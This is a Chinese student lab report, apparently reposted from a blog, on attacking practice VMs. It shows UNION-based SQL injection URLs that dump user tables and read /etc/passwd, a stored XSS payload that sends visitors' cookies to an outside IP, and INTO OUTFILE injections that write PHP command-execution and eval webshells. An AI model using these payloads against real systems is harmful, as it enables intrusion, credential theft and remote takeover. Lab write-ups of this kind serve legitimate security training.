实验报告 五

1.sql注入

首先搭建虚拟机 用kali扫描下当前网段 发现一个192.168.138.134的可疑ip地址

打开该虚拟机提供的网页 使用发现可能存在sql注入点

http://192.168.138.134/cat.php?id=1

http://192.168.138.134/cat.php?id=1'

使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉及到四列元素

使用联合查询 查看网页的显示位

 发现2是回显位,发现数据库的名字为photoblog

http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

顺势查到数据库中的表,可见users表对我们有用

http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

继续查询users表中列名,有变量名 id,login,password

 查看users表中的数据:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

 

jiemi

MD5解密后,得到密码P4ssw0rd

登录到管理员页面

尝试上传文件,发现nophp

改完后缀名发现,可以绕过,并上传成功

 得到目录,用菜刀连一下

2.xss靶机攻击

nmap 扫描一下发现靶机开着80端口和ssh协议

发现有弹窗回显,存在xss漏洞

在靶机上留言<script>document.write('<img src="http://192.168.138.139/?'+document.cookie+' "/>')</script>

可以将任意登录用户的cookie发送到指定ip 在指定 ip 接受 cookie 后可以伪造成登陆者

在原来机器上登录admin账户,密码P4ssw0rd

刷新下页面,发现已经已admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

http://192.168.138.135/admin/edit.php?id=4 union select 1,2,3,4

发现2和3可以显示出来。

 

http://192.168.138.135/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.138.135/css/s.php

说明s.php文件成功写入到/var/www/css 目录,下面将

<?php system($_GET['c']); ?>

写入z.php中,构造url为:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

下面写入一句话木马,构造url:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

猜你喜欢

转载自www.cnblogs.com/P201521410043/p/8906642.html